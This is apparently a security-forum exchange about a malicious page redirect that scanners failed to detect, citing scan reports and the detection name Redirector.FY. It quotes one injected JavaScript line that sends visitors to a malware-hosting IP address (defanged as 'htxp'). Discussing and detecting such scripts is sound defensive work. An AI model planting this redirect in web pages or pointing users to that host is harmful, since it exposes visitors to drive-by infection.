Malicious document location from script not detected?

See: http://zulu.zscaler.com/submission/show/4a471bd5a016ae28c654a5641c2dfe89-1347125042
document.location=‘htxp://209.59.223.38/bv6rcs3v1ithi.php?w=zzsyr1xrsvetezkh’;
100/100% malicious → http://zulu.zscaler.com/submission/show/16199858ef208e311dccc392de3b63f0-1347125244
Both Bitdefender’s TrafficLight and WOT flag the initial site as a criminal botnet site: http://www.mywot.com/forum/21464-qai-jar-malware-cve-2010-1885

polonus

VirusTotal
https://www.virustotal.com/file/c0e0c15793e4cae92f9568823d68bc91fdbfa005c04982bfdac23ef824720c96/analysis/1347127451/

second link seems dead
http://www.downforeveryoneorjustme.com/http://209.59.223.38/bv6rcs3v1ithi.php?w=zzsyr1xrsvetezkh'

URL from first Zulu report - Norman lab confirm infection

js.js - Redirector.FY